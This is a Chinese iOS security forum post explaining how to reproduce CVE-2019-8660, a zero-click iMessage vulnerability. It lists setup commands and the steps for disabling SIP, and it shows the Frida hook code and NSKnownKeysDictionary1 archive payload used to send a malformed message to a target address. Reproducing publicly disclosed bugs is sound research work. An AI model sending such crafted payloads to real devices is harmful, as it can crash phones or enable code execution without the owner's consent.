《九阴真经: iOS黑客攻防秘籍》新书发布,干货满满,快来看看吧!

iOS 安全论坛 - 专注于研究 iOS 安全

 找回密码
 立即注册
查看: 2238|回复: 1

CVE-2019-8660 iMessage 漏洞复现

[复制链接]

119

主题

580

帖子

2609

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
2609
发表于 2019-8-9 01:00:39 | 显示全部楼层 |阅读模式
近期谷歌的研究人员披露了 5 个 iOS 中安全漏洞,并公布了 POC(Proof of concept),攻击者利用这些漏洞可以通过 iMessage 发送精心设计的消息来攻击 iOS 设备,这些漏洞不需要和任何用户交互,只要目标机 iMessage 信息接收成功即可触发漏洞。
CVE-2019-8660、 CVE-2019-8662、 CVE-2019-8647 这三个漏洞可以导致系统重启,或者任意代码执行。
CVE-2019-8646 这个漏洞可以导致任意文件读取,比如发送 iMessage 信息到目标机,可以获取到目标机的照片。
CVE-2019-8641 这个漏洞由于在最新的 12.4 系统上未修复,所以并未公布具体细节。其他 4 个漏洞已经在 12.4 修复。
复现漏洞
首先是要复现漏洞,以 CVE-2019-8660 为例,其他几个漏洞的复现方式类似。在测试之前,请打开 iOS 设备上的 iMessage 的消息接收,方法是点击设置 -> 信息 -> 打开 iMessage 信息开关。下面是复现漏洞的具体步骤:
(1) 安装 python3
brew install python3

(2) 安装 frida
pip3 install frida


(4) 将 sendMessage.py 里的 receiver 替换成目标邮箱地址
  1. #receiver = "YOUR EMAIL"
  2. receiver = "exchen99@foxmail.com"
复制代码

(5) 将 injectMessage.js 里的 obj 文件的路径填写成你本机的
  1. //var d = ObjC.classes.NSData.dataWithContentsOfFile_("PATH/obj");
  2. var d = ObjC.classes.NSData.dataWithContentsOfFile_("/Users/exchen/Downloads/knownkeydict/obj");
复制代码

(6) 需要关闭 SIP (System Integrity Protection,系统完整性保护),方法是重启按住 Commond + R 进入 recovery 模式,在实用工具里打开终端,输入 csrutil disable 即可禁用 SIP,然后重启进入正常模式。测试完漏洞之后别忘记打开 SIP,方法是:进入 recovery 模式,输入 csrutil enable。如果没有这一步操作,frida 注入进程可能会失败。

(7) 最后执行 sendMessage.py 发送 iMessage,只要目标机接收到 iMessage 消息即可以触发漏洞,并不需要点击查看。
python3 sendMessage.py
触发漏洞的目标机重启之后,打开短信应用会闪退,原因是之前测试的那条带漏洞的 iMessage 消息还存在,会被短信应用加载,加载错误就闪退了。解决的方法是给目标机多发送几条正常的信息,这样会覆盖掉带漏洞的短信,然后在搜索栏输入关键字定位到有问题的短信,删除即可。

POC 的实现原理
POC 的实现原理是使用 AppleScript 调用 macOS 的信息应用对目标发送 iMessage 消息,其中使用 frida 对 jw_encode_dictionary_addr 函数进行 Hook,修改原始的消息体结构。在 injectMessage.js 里有构造带有漏洞的 iMessage 消息体的代码,核心代码如下:
  1. console.log(dict);  //打印原始正常的消息体
  2. //对正常的消息体进行修改,构造带有漏洞的消息体
  3. var newDict = ObjC.classes.NSMutableDictionary.dictionaryWithCapacity_(dict.count());
  4. var d = ObjC.classes.NSData.dataWithContentsOfFile_("/Users/exchen/Downloads/knownkeydict/obj");
  5. console.log(d);  //打印obj文件
  6. newDict.setObject_forKey_("com.apple.messages.MSMessageExtensionBalloonPlugin:0000000000:com.apple.mobileslideshow.PhotosMessagesApp", "bid");
  7. newDict.setObject_forKey_(d, "bp");  //obj文件
  8. // newDict.setObject_forKey_("com.apple.messages.URLBalloonProvider", "bid");

  9. newDict.setObject_forKey_(8, "gv");
  10. newDict.setObject_forKey_(0, "pv");
  11. newDict.setObject_forKey_(1, "v");
  12. newDict.setObject_forKey_("FAA29682-27A6-498D-8170-CC92F2077441", "gid");
  13. newDict.setObject_forKey_(d, "bp");
  14. newDict.setObject_forKey_("CB2F0B8D-84F6-480E-9079-27DA53E14EBD", "r");
  15. newDict.setObject_forKey_(1, "v");

  16. newDict.setObject_forKey_("\Ufffd\Ufffc", "t");
  17. args[0] = newDict.handle;
复制代码

替换的 iMessage 消息体会放入 obj 文件,obj 文件里有一个 NSKnownKeyDictionary1 对象,正是因为解析 NSKnownKeyDictionary1 对象时引发问题造成的漏洞的触发。
  1. <dict>
  2.     <key>$classes</key>
  3.     <array>
  4.         <string>NSDictionary</string>
  5.         <string>NSObject</string>
  6.     </array>
  7.     <key>$classname</key>
  8.     <string>NSKnownKeysDictionary1</string>
  9. </dict>
  10. <dict>
  11.     <key>$classes</key>
  12.     <array>
  13.         <string>NSKnownKeysMappingStrategy1</string>
  14.         <string>NSObject</string>
  15.     </array>
  16.     <key>$classname</key>
  17.     <string>NSKnownKeysMappingStrategy1</string>
  18. </dict>
  19. <string>i am very long indeed</string>
  20. <dict>
复制代码

上面的 obj 文件实际上是 Archive (归档)文件, 通过 NSKeyedArchiver 里的方法可以构造 Archive 文件,示例如下:
  1. NSDictionary* obj = @{@"testKey": @"testValue", @"testArray":@[@100, @200, @300], @"testDict":@{@"dictKey":@"dictValue"}};

  2. NSData* data = [NSKeyedArchiver archivedDataWithRootObject:obj requiringSecureCoding:true error:&err];
  3. if (!data) {
  4.     NSLog(@"Error: %@", err);
  5.     return;
  6. }
  7. [data writeToFile:@"/Users/exchen/Downloads/archive_test" atomically:YES];
复制代码

iMessage 的消息内容是在 sendMessage.py,我们可以替换 REPLACEME 发送自定义的消息
  1. subprocess.call(["osascript", "sendMessage.applescript", receiver, "REPLACEME"]
复制代码

然后在 injectMessage.js 中也需要将 REPLACEME 保持和自定义的消息内容一致
  1. if (t == "REPLACEME")
复制代码

参考资料:

回复

使用道具 举报

6

主题

39

帖子

168

积分

注册会员

Rank: 2

积分
168
发表于 2019-8-12 14:33:57 | 显示全部楼层
强啊。。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|iOSHacker

GMT+8, 2021-11-28 10:22 , Processed in 0.019494 second(s), 19 queries .

iOS安全论坛

© 2017-2020 iOS Hacker Inc. 京ICP备17074153号-2

快速回复 返回顶部 返回列表